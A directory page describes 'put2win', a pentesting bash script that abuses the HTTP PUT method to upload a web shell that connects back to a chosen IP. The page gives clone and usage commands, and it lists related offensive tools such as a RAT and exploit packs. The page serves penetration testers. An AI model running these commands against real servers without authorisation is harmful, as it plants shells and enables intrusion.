devploit / Put2win
Licence: gpl-3.0
Script to automate PUT HTTP method exploitation to get shell
Stars: ✭ 96
Labels
Projects that are alternatives of or similar to Put2win
Cloudfail
Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
Stars: ✭ 1,239 (+1190.63%)
Mutual labels: pentesting
Watf Bank
WaTF Bank - What a Terrible Failure Mobile Banking Application for Android and iOS
Stars: ✭ 87 (-9.37%)
Mutual labels: pentesting
Winpwn
Automation for internal Windows Penetrationtest / AD-Security
Stars: ✭ 1,303 (+1257.29%)
Mutual labels: pentesting
Zynix Fusion
zynix-Fusion is a framework that aims to centralize, standardizeand simplify the use of various security tools for pentest professionals.zynix-Fusion (old name: Linux evil toolkit) has few simple commands, one of which is theinit function that allows you to define a target, and thus use all the toolswithout typing anything else.
Stars: ✭ 84 (-12.5%)
Mutual labels: pentesting
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-9.37%)
Mutual labels: pentesting
Pentest Notes
Collection of Pentest Notes and Cheatsheets from a lot of repos (SofianeHamlaoui,dostoevsky,mantvydasb,adon90,BriskSec)
Stars: ✭ 89 (-7.29%)
Mutual labels: pentesting
Resource files
mosquito - Automating reconnaissance and brute force attacks
Stars: ✭ 95 (-1.04%)
Mutual labels: pentesting
Blackrat
BlackRAT - Java Based Remote Administrator Tool
Stars: ✭ 87 (-9.37%)
Mutual labels: pentesting
Katzkatz
Python3 script to parse txt files containing Mimikatz output
Stars: ✭ 91 (-5.21%)
Mutual labels: pentesting
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-11.46%)
Mutual labels: pentesting
Git pentesting toolkit
Exploit pack for pentesters and ethical hackers.
Stars: ✭ 86 (-10.42%)
Mutual labels: pentesting
Acamar
A Python3 based single-file subdomain enumerator
Stars: ✭ 89 (-7.29%)
Mutual labels: pentesting
Gitjacker
🔪 Leak git repositories from misconfigured websites
Stars: ✭ 1,249 (+1201.04%)
Mutual labels: pentesting
Flask Unsign
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Stars: ✭ 90 (-6.25%)
Mutual labels: pentesting
Pentesting Cookbook
A set of recipes useful in pentesting and red teaming scenarios
Stars: ✭ 82 (-14.58%)
Mutual labels: pentesting
Swurg
Parse OpenAPI documents into Burp Suite for automating OpenAPI-based APIs security assessments (approved by PortSwigger for inclusion in their official BApp Store).
Stars: ✭ 94 (-2.08%)
Mutual labels: pentesting
Eyes.sh
Let's you perform domain/IP information gathering... in BASH! Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?"
Stars: ✭ 89 (-7.29%)
Mutual labels: pentesting
put2win
Script to automate PUT HTTP method exploitation to get shell.
Installation
git clone https://github.com/sysdevploit/put2win
cd put2win
chmod +x put2win.sh
Usage
Script to automate PUT HTTP method exploitation to get shell.
Options:
-t TARGET Target URL/IP (e.g. 192.168.1.10)
-p PORT Target PORT (e.g. 8080)
-u URL PATH Path to save the shell (e.g. /uploads)
-l LOCAL IP IP where the shell will connect (e.g. 192.168.1.5)
-s SHELL NAME Shell name (e.g. license.php)
Examples of use:
- bash put2win.sh -t 192.168.1.80 -l 192.168.1.10 -s readme.php
- bash put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10
Contact
Telegram: @devploit
Twitter: @devploit
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].